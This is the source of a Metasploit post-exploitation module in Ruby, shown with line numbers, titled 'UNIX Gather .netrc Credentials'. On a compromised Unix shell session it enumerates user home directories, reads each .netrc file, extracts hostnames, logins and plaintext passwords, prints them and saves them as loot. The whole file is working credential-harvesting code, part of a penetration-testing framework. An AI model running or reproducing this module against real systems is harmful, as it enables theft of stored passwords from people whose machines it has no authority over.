Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  include Msf::Post::Unix
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'UNIX Gather .netrc Credentials',
15
        'Description' => %q{
16
          Post Module to obtain credentials saved for FTP and other services in .netrc
17
        },
18
        'License' => MSF_LICENSE,
19
        'Author' => [ 'Jon Hart <jhart[at]spoofed.org>' ],
20
        'Platform' => %w[bsd linux osx unix],
21
        'SessionTypes' => [ 'shell' ]
22
      )
23
    )
24
  end
25

26
  def run
27
    # A table to store the found credentials.
28
    cred_table = Rex::Text::Table.new(
29
      'Header' => '.netrc credentials',
30
      'Indent' => 1,
31
      'Columns' =>
32
      [
33
        'Username',
34
        'Password',
35
        'Server',
36
      ]
37
    )
38

39
    # all of the credentials we've found from .netrc
40
    creds = []
41

42
    # walk through each user directory
43
    print_status('Enumerating .netrc files')
44
    enum_user_directories.each do |user_dir|
45
      netrc_file = user_dir + '/.netrc'
46
      # the current credential from .netrc we are parsing
47
      cred = {}
48

49
      # read their .netrc
50
      unless readable? netrc_file
51
        vprint_error("Couldn't read #{netrc_file}")
52
        next
53
      end
54
      print_status("Reading: #{netrc_file}")
55
      read_file(netrc_file).each_line do |netrc_line|
56
        # parse it
57
        netrc_line.strip!
58
        # get the machine name
59
        if (netrc_line =~ /machine (\S+)/)
60
          # if we've already found a machine, save this cred and start over
61
          if (cred[:host])
62
            creds << cred
63
            cred = {}
64
          end
65
          cred[:host] = ::Regexp.last_match(1)
66
        end
67
        # get the user name
68
        if (netrc_line =~ /login (\S+)/)
69
          cred[:user] = ::Regexp.last_match(1)
70
        end
71
        # get the password
72
        if (netrc_line =~ /password (\S+)/)
73
          cred[:pass] = ::Regexp.last_match(1)
74
        end
75
      end
76

77
      # save whatever remains of this last cred if it is worth saving
78
      creds << cred if (cred[:host] && cred[:user] && cred[:pass])
79
    end
80

81
    # print out everything we've found
82
    creds.each do |cred|
83
      cred_table << [ cred[:user], cred[:pass], cred[:host] ]
84
    end
85

86
    if cred_table.rows.empty?
87
      print_status('No creds collected')
88
    else
89
      print_line("\n" + cred_table.to_s)
90

91
      # store all found credentials
92
      p = store_loot(
93
        'netrc.creds',
94
        'text/csv',
95
        session,
96
        cred_table.to_csv,
97
        'netrc_credentials.txt',
98
        '.netrc credentials'
99
      )
100

101
      print_status("Credentials stored in: #{p}")
102
    end
103
  end
104
end
105

106